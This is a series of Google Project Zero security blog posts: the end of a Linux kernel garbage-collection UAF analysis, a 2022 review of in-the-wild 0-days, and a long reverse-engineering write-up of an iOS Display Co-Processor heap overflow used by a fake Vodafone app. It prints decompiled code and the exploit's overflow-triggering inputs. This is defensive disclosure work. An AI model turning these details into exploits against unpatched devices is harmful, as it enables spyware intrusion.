void unix_notinflight(struct user_struct *user, struct file *fp)

        if (s) {

                struct unix_sock *u = unix_sk(s);

 

+               BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

 

                if (atomic_long_dec_and_test(&u->inflight))

At first glance, it seems that the BUG_ON can prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage,  it can waive the BUG_ON check by heap spray.

New Garbage Collection Discovered in 2021

CVE-2021-4083 deserves an honorable mention: when I discussed CVE-2021-0920 with Jann Horn and Ben Hawkes, Jann found another issue in the garbage collection, described in the Project Zero blog post Racing against the clock -- hitting a tiny kernel race window.

\

Part I Conclusion

To recap, we have discussed the kernel internals of SCM_RIGHTS and the designs and implementations of the Linux kernel garbage collector. Besides, we have analyzed the behavior of MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF by a subtle and arcane race condition.

The bug was spotted in 2016 publicly, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actors who saw the public email thread may have a chance to develop an LPE exploit against the Linux kernel.

In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.

2022 0-day In-the-Wild Exploitation…so far

30 June 2022 at 13:00

Posted by Maddie Stone, Google Project Zero

This blog post is an overview of a talk, “ 0-day In-the-Wild Exploitation in 2022…so far”, that I gave at the FIRST conference in June 2022. The slides are available here.

For the last three years, we’ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the 2021 Year in Review report, which we published just a few months ago in April. While we plan to stick with that annual cadence, we’re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022.        

As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.  

Product

2022 ITW 0-day

Variant

Windows win32k

CVE-2022-21882

CVE-2021-1732 (2021 itw)

iOS IOMobileFrameBuffer

CVE-2022-22587

CVE-2021-30983 (2021 itw)

Windows

CVE-2022-30190 (“Follina”)

CVE-2021-40444 (2021 itw)

Chromium property access interceptors

CVE-2022-1096

CVE-2016-5128 CVE-2021-30551 (2021 itw) CVE-2022-1232 (Addresses incomplete CVE-2022-1096 fix)

Chromium v8

CVE-2022-1364

CVE-2021-21195

WebKit

CVE-2022-22620 (“Zombie”)

Bug was originally fixed in 2013, patch was regressed in 2016

Google Pixel

CVE-2021-39793*

* While this CVE says 2021, the bug was patched and disclosed in 2022

Linux same bug in a different subsystem

Atlassian Confluence

CVE-2022-26134

CVE-2021-26084

Windows

CVE-2022-26925 (“PetitPotam”)

CVE-2021-36942 (Patch regressed)

So, what does this mean?

When people think of 0-day exploits, they often think that these exploits are so technologically advanced that there’s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we’ve seen so far this year are closely related to bugs we’ve seen before. Our conclusion and findings in the 2020 year-in-review report were very similar.

Many of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn’t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the slides from the talk.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.

This is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report:

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

 

Practically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:

  • Root cause analysis

Understanding the underlying vulnerability that is being exploited. Also tries to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.

  • Variant analysis

Looking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn’t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply “plug and play” with a new vulnerability once the original is patched.

  • Patch analysis

Analyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor’s own internal analysis.

  • Exploit technique analysis

Understanding the primitive gained from the vulnerability and how it’s being used. While it’s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn’t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.

Transparently sharing these analyses helps the industry as a whole as well. We publish our analyses at this repository. We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall.  

The curious tale of a fake Carrier.app

23 June 2022 at 16:01

Posted by Ian Beer, Google Project Zero


NOTE: This issue was CVE-2021-30983 was fixed in iOS 15.2 in December 2021. 


Towards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:

App splash screen showing the Vodafone carrier logo and the text My Vodafone.

App splash screen showing the Vodafone carrier logo and the text "My Vodafone" (not the legitimate Vodadone app)



Although this looks like the real My Vodafone carrier app available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.


This sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple Enterprise developer program. This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push "trusted apps" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.


In collaboration with Project Zero, TAG has published an additional post with more details around the targeting and the actor. The rest of this blogpost is dedicated to the technical analysis of the app and the exploits contained therein.

App structure

The app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.


Agent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the Whatsapp messages database.


Six privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.


This blog post is the story of the last exploit and the month-long journey to understand it.

Something's missing? Or am I missing something?

Although all the exploits were different, five of them shared a common high-level structure. An initial phase where the kernel heap was manipulated to control object placement. Then the triggering of a kernel vulnerability followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory then building an arbitrary kernel memory write primitive.


The sixth exploit didn't have anything like that.


Perhaps it could be triggering a kernel logic bug like Linuz Henze's Fugu14 exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.


It contained log messages like:


  printf("Failed to prepare fake vtable: 0x%08x", ret);


which seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.


Shortly after that was this log message:


  printf("Waiting for R/W primitives...");


Why would you need to wait?


Then shortly after that:


  printf("Memory read/write and callfunc primitives ready!");


Up to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:


  printf("Unexpected data read from DCP: 0x%08x", v49);

DCP?

In October 2021 Adam Donenfeld tweeted this:


Screenshot of Tweet from @doadam on 11 Oct 2021, which is a retweet from @AmarSaar on 11 October 2021. The tweet from @AmarSaar reads 'So, another IOMFB vulnerability was exploited ITW (15.0.2). I bindiffed the patch and built a POC. And, because it's a great bug, I just finished writing a short blogpost with the tech details, to share this knowledge :) Check it out! https://saaramar.github.io/IOMFB_integer_overflow_poc/' and the retweet from @doadam reads 'This has been moved to the display coprocessor (DCP) starting from 15, at least on iPhone 12 (and most probably other ones as well)'.

DCP is the "Display Co-Processor" which ships with iPhone 12 and above and all M1 Macs.


There's little public information about the DCP; the most comprehensive comes from the Asahi linux project which is porting linux to M1 Macs. In their August 2021 and September 2021 updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by @alyssarzg. Asahi describe the DCP like this:


On most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary… they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU!

https://asahilinux.org/2021/08/progress-report-august-2021/


The Asahi linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.

Setting the stage

Before diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?


Years ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from Tech Insights that the CPU cores in the middle and right hand side take up only around 10% of the die:

M1 die-shot from techinsights.com with possible location of DCP highlighted.

M1 die-shot from techinsights.com with possible location of DCP added

https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1


Companies like SystemPlus perform very thorough analysis of these dies. Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.


With just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.

My kingdom for a .dSYM!

The first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. The DCP firmware is this file:



  Firmware/dcp/iphone13dcp.im4p


The im4p in this case is just a 25 byte header which we can discard:


  $ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1

  $ file iphone13dcp

  iphone13dcp: Mach-O 64-bit preload executable arm64


It's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:


  $ nm -a iphone13dcp

  iphone13dcp: no symbols


Function names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image ("M3_CA_ResponseLUT read: 0x%08x" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.


Since the firmware images are distributed as .zip files and Apple's servers support range requests with a bit of python and the partialzip tool we can relatively easily and quickly get every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.


Guess we'll have to do this the hard way!

Day 1; Instruction 1

$ otool -h raw_fw/iphone13dcp

raw_fw/iphone13dcp:

Mach header

magic      cputype   cpusubtype caps filetype ncmds sizeofcmds flags

0xfeedfacf 0x100000C 0          0x00 5        5     2240       0x00000001


That cputype is plain arm64 (ArmV8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.


With any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:


A short list of C++ prototypes like IOMFB::UPBlock_ALSS::init(IOMFB::UPPipe *).

The cross-references to those strings look like this:


log(0x40000001LL,

    "UPBlock_ALSS.cpp",

    341,

    "%s: capture buffer exhausted, aborting capture\n",

    "void IOMFB::UPBlock_ALSS::send_data(uint64_t, uint32_t)");


This is almost certainly a logging macro which expands __FILE__, __LINE__ and __PRETTY_FUNCTION__. This allows us to start renaming functions and finding vtable pointers.

Object structure

From the Asahi linux blog posts we know that the DCP is using an Apple-proprietary RTOS called RTKit for which there is very little public information. There are some strings in the binary with the exact version:


ADD  X8, X8, #aLocalIphone13d@PAGEOFF ; "local-iphone13dcp.release"

ADD  X9, X9, #aRtkitIos182640@PAGEOFF ; "RTKit_iOS-1826.40.9.debug"


The code appears to be predominantly C++. There appear to be multiple C++ object hierarchies; those involved with this vulnerability look a bit like IOKit C++ objects. Their common base class looks like this:


struct __cppobj RTKIT_RC_RTTI_BASE

{

  RTKIT_RC_RTTI_BASE_vtbl *__vftable /*VFT*/;

  uint32_t refcnt;

  uint32_t typeid;

};


(These structure definitions are in the format IDA uses for C++-like objects)


The RTKit base class has a vtable pointer, a reference count and a four-byte Run Time Type Information (RTTI) field - a 4-byte ASCII identifier like BLHA, WOLO, MMAP, UNPI, OSST, OSBO and so on. These identifiers look a bit cryptic but they're quite descriptive once you figure them out (and I'll describe the relevant ones as we encounter them.)


The base type has the following associated vtable:


struct /*VFT*/ RTKIT_RC_RTTI_BASE_vtbl

{

  void (__cdecl *take_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *take_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *getClassName)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *dtor_a)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *unk)(RTKIT_RC_RTTI_BASE *this);

};

Exploit flow

The exploit running in the app starts by opening an IOKit user client for the AppleCLCD2 service. AppleCLCD seems to be the application processor of IOMobileFrameBuffer and AppleCLCD2 the DCP version.


The exploit only calls 3 different external method selectors on the AppleCLCD2 user client: 68, 78 and 79.


The one with the largest and most interesting-looking input is 78, which corresponds to this user client method in the kernel driver:


IOReturn

IOMobileFramebufferUserClient::s_set_block(

  IOMobileFramebufferUserClient *this,

  void *reference,

  IOExternalMethodArguments *args)

{

  const unsigned __int64 *extra_args;

  u8 *structureInput;

  structureInput = args->structureInput;

  if ( structureInput && args->scalarInputCount >= 2 )

  {

    if ( args->scalarInputCount == 2 )

      extra_args = 0LL;

    else

      extra_args = args->scalarInput + 2;

    return this->framebuffer_ap->set_block_dcp(

             this->task,

             args->scalarInput[0],

             args->scalarInput[1],

             extra_args,

             args->scalarInputCount - 2,

             structureInput,

             args->structureInputSize);

  } else {

    return 0xE00002C2;

  }

}


this unpacks the IOConnectCallMethod arguments and passes them to:


IOMobileFramebufferAP::set_block_dcp(

        IOMobileFramebufferAP *this,

        task *task,

        int first_scalar_input,

        int second_scalar_input,

        const unsigned __int64 *pointer_to_remaining_scalar_inputs,

        unsigned int scalar_input_count_minus_2,

        const unsigned __int8 *struct_input,

        unsigned __int64 struct_input_size)


This method uses some autogenerated code to serialise the external method arguments into a buffer like this:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u64 cntExtraScalars

  u8[] structInput

  u64 CntStructInput

}


which is then passed to UnifiedPipeline2::rpc along with a 4-byte ASCII method identifier ('A435' here):


UnifiedPipeline2::rpc(

      'A435',

      arg_struct,

      0x105Cu,

      &retval_buf,

      4u);


UnifiedPipeline2::rpc calls DCPLink::rpc which calls AppleDCPLinkService::rpc to perform one more level of serialisation which packs the method identifier and a "stream identifier" together with the arg_struct shown above.


AppleDCPLinkService::rpc then calls rpc_caller_gated to allocate space in a shared memory buffer, copy the buffer into there then signal to the DCP that a message is available.


Effectively the implementation of the IOMobileFramebuffer user client has been moved on to the DCP and the external method interface is now a proxy shim, via shared memory, to the actual implementations of the external methods which run on the DCP.

Exploit flow: the other side

The next challenge is to find where the messages start being processed on the DCP. Looking through the log strings there's a function which is clearly called ​​rpc_callee_gated - quite likely that's the receive side of the function rpc_caller_gated we saw earlier.


rpc_callee_gated unpacks the wire format then has an enormous switch statement which maps all the 4-letter RPC codes to function pointers:


      switch ( rpc_id )

      {

        case 'A000':

          goto LABEL_146;

        case 'A001':

          handler_fptr = callback_handler_A001;

          break;

        case 'A002':

          handler_fptr = callback_handler_A002;

          break;

        case 'A003':

          handler_fptr = callback_handler_A003;

          break;

        case 'A004':

          handler_fptr = callback_handler_A004;

          break;

        case 'A005':

          handler_fptr = callback_handler_A005;

          break;


At the the bottom of this switch statement is the invocation of the callback handler:


ret = handler_fptr(

          meta,

          in_struct_ptr,

          in_struct_size,

          out_struct_ptr,

          out_struct_size);


in_struct_ptr points to a copy of the serialised IOConnectCallMethod arguments we saw being serialized earlier on the application processor:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u32 cntExtraScalars

  u8[] structInput

  u64 cntStructInput

}


The callback unpacks that buffer and calls a C++ virtual function:


unsigned int

callback_handler_A435(

  u8* meta,

  void *args,

  uint32_t args_size,

  void *out_struct_ptr,

  uint32_t out_struct_size

{

  int64 instance_id;

  uint64_t instance;

  int err;

  int retval;

  unsigned int result;

  instance_id = meta->instance_id;

  instance =

    global_instance_table[instance_id].IOMobileFramebufferType;

  if ( !instance ) {

    log_fatal(

      "IOMFB: %s: no instance for instance ID: %u\n",

      "static T *IOMFB::InstanceTracker::instance"

        "(IOMFB::InstanceTracker::tracked_entity_t, uint32_t)"

        " [T = IOMobileFramebuffer]",

      instance_id);

  }

  err = (instance-16)->vtable_0x378( // virtual call

         (instance-16),

         args->task,

         args->scalar_input_0,

         args->scalar_input_1,

         args->remaining_scalar_inputs,

         args->cntExtraScalars,

         args->structInput,

         args->cntStructInput);

  retval = convert_error(err);

  result = 0;

  *(_DWORD *)out_struct_ptr = retval;

  return result;

}


The challenge here is to figure out where that virtual call goes. The object is being looked up in a global table based on the instance id. We can't just set a breakpoint and whilst emulating the firmware is probably possible that would likely be a long project in itself. I took a hackier approach: we know that the vtable needs to be at least 0x380 bytes large so just go through all those vtables, decompile them and see if the prototypes look reasonable!


There's one clear match in the vtable for the UNPI type:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)


Here's my reversed implementation of UNPI::set_block

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)

{

  struct block_handler_holder *holder;

  struct metadispatcher metadisp;

  if ( second_scalar_input )

    return 0x80000001LL;

  holder = this->UPPipeDCP_H13P->block_handler_holders;

  if ( !holder )

    return 0x8000000BLL;

  metadisp.address_of_some_zerofill_static_buffer = &unk_3B8D18;

  metadisp.handlers_holder = holder;

  metadisp.structure_input_buffer = structure_input_buffer;

  metadisp.structure_input_size = structure_input_size;

  metadisp.remaining_scalar_inputs = remaining_scalar_inputs;

  metadisp.cnt_remaining_sclar_input = cnt_remaining_scalar_inputs;

  metadisp.some_flags = 0x40000000LL;

  metadisp.dispatcher_fptr = a_dispatcher;

  metadisp.offset_of_something_which_looks_serialization_related = &off_1C1308;

  return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);

}


This method wraps up the arguments into another structure I've called metadispatcher:


struct __attribute__((aligned(8))) metadispatcher

{

 uint64_t address_of_some_zerofill_static_buffer;

 uint64_t some_flags;

 __int64 (__fastcall *dispatcher_fptr)(struct metadispatcher *, struct BlockHandler *, __int64, _QWORD);

 uint64_t offset_of_something_which_looks_serialization_related;

 struct block_handler_holder *handlers_holder;

 uint64_t structure_input_buffer;

 uint64_t structure_input_size;

 uint64_t remaining_scalar_inputs;

 uint32_t cnt_remaining_sclar_input;

};


That metadispatcher object is then passed to this method:


return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);


In there we reach this code:


  block_type_handler = lookup_a_handler_for_block_type_and_subtype(

                         a1,

                         first_scalar_input, // block_type

                         a3);                // subtype


The exploit calls this set_block external method twice, passing two different values for first_scalar_input, 7 and 19. Here we can see that those correspond to looking up two different block handler objects here.


The lookup function searches a linked list of block handler structures; the head of the list is stored at offset 0x1448 in the UPPipeDCP_H13P object and registered dynamically by a method I've named add_handler_for_block_type:


add_handler_for_block_type(struct block_handler_holder *handler_list,

                           struct BlockHandler *handler)

The logging code tells us that this is in a file called IOMFBBlockManager.cpp. IDA finds 44 cross-references to this method, indicating that there are probably that many different block handlers. The structure of each registered block handler is something like this:


struct __cppobj BlockHandler : RTKIT_RC_RTTI_BASE

{

  uint64_t field_16;

  struct handler_inner_types_entry *inner_types_array;

  uint32_t n_inner_types_array_entries;

  uint32_t field_36;

  uint8_t can_run_without_commandgate;

  uint32_t block_type;

  uint64_t list_link;

  uint64_t list_other_link;

  uint32_t some_other_type_field;

  uint32_t some_other_type_field2;

  uint32_t expected_structure_io_size;

  uint32_t field_76;

  uint64_t getBlock_Impl;

  uint64_t setBlock_Impl;

  uint64_t field_96;

  uint64_t back_ptr_to_UPPipeDCP_H13P;

};


The RTTI type is BLHA (BLock HAndler.)


For example, here's the codepath which builds and registers block handler type 24:


BLHA_24 = (struct BlockHandler *)CXXnew(112LL);

BLHA_24->__vftable = (BlockHandler_vtbl *)BLHA_super_vtable;

BLHA_24->block_type = 24;

BLHA_24->refcnt = 1;

BLHA_24->can_run_without_commandgate = 0;

BLHA_24->some_other_type_field = 0LL;

BLHA_24->expected_structure_io_size = 0xD20;

typeid = typeid_BLHA();

BLHA_24->typeid = typeid;

modify_typeid_ref(typeid, 1);

BLHA_24->__vftable = vtable_BLHA_subclass_type_24;

BLHA_24->inner_types_array = 0LL;

BLHA_24->n_inner_types_array_entries = 0;

BLHA_24->getBlock_Impl = BLHA_24_getBlock_Impl;

BLHA_24->setBlock_Impl = BLHA_24_setBlock_Impl;

BLHA_24->field_96 = 0LL;

BLHA_24->back_ptr_to_UPPipeDCP_H13P = a1;

add_handler_for_block_type(list_holder, BLHA_24);


Each block handler optionally has getBlock_Impl and setBlock_Impl function pointers which appear to implement the actual setting and getting operations.


We can go through all the callsites which add block handlers; tell IDA the type of the arguments and name all the getBlock and setBlock implementations:


The IDA Pro Names window showing a list of symbols like BLHA_15_getBlock_Impl.

You can perhaps see where this is going: that's looking like really quite a lot of reachable attack surface! Each of those setBlock_Impl functions is reachable by passing a different value for the first scalar argument to IOConnectCallMethod 78.


There's a little bit more reversing though to figure out how exactly to get controlled bytes to those setBlock_Impl functions:

Memory Mapping

The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input. There's another level of indirection: each individual block handler structure has an array of supported "subtypes" which contains metadata detailing where to find the (userspace) pointer to that subtype's input data in the IOConnectCallMethod structure input. The first dword in the structure input is the id of this subtype - in this case for the block handler type 19 the metadata array has a single entry:


<2, 0, 0x5F8, 0x600>


The first value (2) is the subtype id and 0x5f8 and 0x600 tell the DCP from what offset in the structure input data to read a pointer and size from. The DCP then requests a memory mapping from the AP for that memory from the calling task:


return wrap_MemoryDescriptor::withAddressRange(

  *(void*)(structure_input_buffer + addr_offset),

  *(unsigned int *)(structure_input_buffer + size_offset),

  caller_task_ptr);


We saw earlier that the AP sends the DCP the struct task pointer of the calling task; when the DCP requests a memory mapping from a user task it sends those raw task struct pointers back to the AP such that the kernel can perform the mapping from the correct task. The memory mapping is abstracted as an MDES object on the DCP side; the implementation of the mapping involves the DCP making an RPC to the AP:


make_link_call('D453', &req, 0x20, &resp, 0x14);


which corresponds to a call to this method on the AP side:


IOMFB::MemDescRelay::withAddressRange(unsigned long long, unsigned long long, unsigned int, task*, unsigned long*, unsigned long long*)


The DCP calls ::prepare and ::map on the returned MDES object (exactly like an IOMemoryDescriptor object in IOKit), gets the mapped pointer and size to pass via a few final levels of indirection to the block handler:


a_descriptor_with_controlled_stuff->dispatcher_fptr(

  a_descriptor_with_controlled_stuff,

  block_type_handler,

  important_ptr,

  important_size);


where the dispatcher_fptr looks like this:


a_dispatcher(

        struct metadispatcher *disp,

        struct BlockHandler *block_handler,

        __int64 controlled_ptr,

        unsigned int controlled_size)

{

  return block_handler->BlockHandler_setBlock(

           block_handler,

           disp->structure_input_buffer,

           disp->structure_input_size,

           disp->remaining_scalar_inputs,

           disp->cnt_remaining_sclar_input,

           disp->handlers_holder->gate,

           controlled_ptr,

           controlled_size);

}


You can see here just how useful it is to keep making structure definitions while reversing; there are so many levels of indirection that it's pretty much impossible to keep it all in your head.


BlockHandler_setBlock is a virtual method on BLHA. This is the implementation for BLHA 19:


BlockHandler19::setBlock(

  struct BlockHandler *this,

  void *structure_input_buffer,

  int64 structure_input_size,

  int64 *remaining_scalar_inputs,

  unsigned int cnt_remaining_scalar_inputs,

  struct CommandGate *gate,

  void* mapped_mdesc_ptr,

  unsigned int mapped_mdesc_length)


This uses a Command Gate (GATI) object (like a call gate in IOKit to serialise calls) to finally get close to actually calling the setBlock_Impl function.


We need to reverse the gate_context structure to follow the controlled data through the gate:


struct __attribute__((aligned(8))) gate_context

{

 struct BlockHandler *the_target_this;

 uint64_t structure_input_buffer;

 void *remaining_scalar_inputs;

 uint32_t cnt_remaining_scalar_inputs;

 uint32_t field_28;

 uint64_t controlled_ptr;

 uint32_t controlled_length;

};


The callgate object uses that context object to finally call the BLHA setBlock handler:


callback_used_by_callgate_in_block_19_setBlock(

  struct UnifiedPipeline *parent_pipeline,

  struct gate_context *context,

  int64 a3,

  int64 a4,

  int64 a5)

{

  return context->the_target_this->setBlock_Impl)(

           context->the_target_this->back_ptr_to_UPPipeDCP_H13P,

           context->structure_input_buffer,

           context->remaining_scalar_inputs,

           context->cnt_remaining_scalar_inputs,

           context->controlled_ptr,

           context->controlled_length);

}

SetBlock_Impl

And finally we've made it through the whole callstack following the controlled data from IOConnectCallMethod in userspace on the AP to the setBlock_Impl methods on the DCP!


The prototype of the setBlock_Impl methods looks like this:


setBlock_Impl(struct UPPipeDCP_H13P *pipe_parent,

              void *structure_input_buffer,

              int *remaining_scalar_inputs,

              int cnt_remaining_scalar_inputs,

              void* ptr_via_memdesc,

              unsigned int len_of_memdesc_mapped_buf)


The exploit calls two setBlock_Impl methods; 7 and 19. 7 is fairly simple and seems to just be used to put controlled data in a known location. 19 is the buggy one. From the log strings we can tell that block type 19 handler is implemented in a file called UniformityCompensator.cpp.


Uniformity Compensation is a way to correct for inconsistencies in brightness and colour reproduction across a display panel. Block type 19 sets and gets a data structure containing this correction information. The setBlock_Impl method calls UniformityCompensator::set and reaches the following code snippet where controlled_size is a fully-controlled u32 value read from the structure input and indirect_buffer_ptr points to the mapped buffer, the contents of which are also controlled:

uint8_t* pages = compensator->inline_buffer; // +0x24

for (int pg_cnt = 0; pg_cnt < 3; pg_cnt++) {

  uint8_t* this_page = pages;

  for (int i = 0; i < controlled_size; i++) {

    memcpy(this_page, indirect_buffer_ptr, 4 * controlled_size);

    indirect_buffer_ptr += 4 * controlled_size;

    this_page += 0x100;

  }

  pages += 0x4000;

}

There's a distinct lack of bounds checking on controlled_size. Based on the structure of the code it looks like it should be restricted to be less than or equal to 64 (as that would result in the input being completely copied to the output buffer.) The compensator->inline_buffer buffer is inline in the compensator object. The structure of the code makes it look that that buffer is probably 0xc000 (three 16k pages) large. To verify this we need to find the allocation site of this compensator object.


It's read from the pipe_parent object and we know that at this point pipe_parent is a UPPipeDCP_H13P object.


There's only one write to that field, here in UPPipeDCP_H13P::setup_tunables_base_target:


compensator = CXXnew(0xC608LL);

...

this->compensator = compensator;


The compensator object is a 0xc608 byte allocation; the 0xc000 sized buffer starts at offset 0x24 so the allocation has enough space for 0xc608-0x24=0xC5E4 bytes before corrupting neighbouring objects.


The structure input provided by the exploit for the block handler 19 setBlock call looks like this:


struct_input_for_block_handler_19[0x5F4] = 70; // controlled_size

struct_input_for_block_handler_19[0x5F8] = address;

struct_input_for_block_handler_19[0x600] = a_size;


This leads to a value of 70 (0x46) for controlled_size in the UniformityCompensator::set snippet shown earlier. (0x5f8 and 0x600 correspond to the offsets we saw earlier in the subtype's table:  <2, 0, 0x5F8, 0x600>)


The inner loop increments the destination pointer by 0x100 each iteration so 0x46 loop iterations will write 0x4618 bytes.


The outer loop writes to three subsequent 0x4000 byte blocks so the third (final) iteration starts writing at 0x24 + 0x8000 and writes a total of 0x4618 bytes, meaning the object would need to be 0xC63C bytes; but we can see that it's only 0xc608, meaning that it will overflow the allocation size by 0x34 bytes. The RTKit malloc implementation looks like it adds 8 bytes of metadata to each allocation so the next object starts at 0xc610.


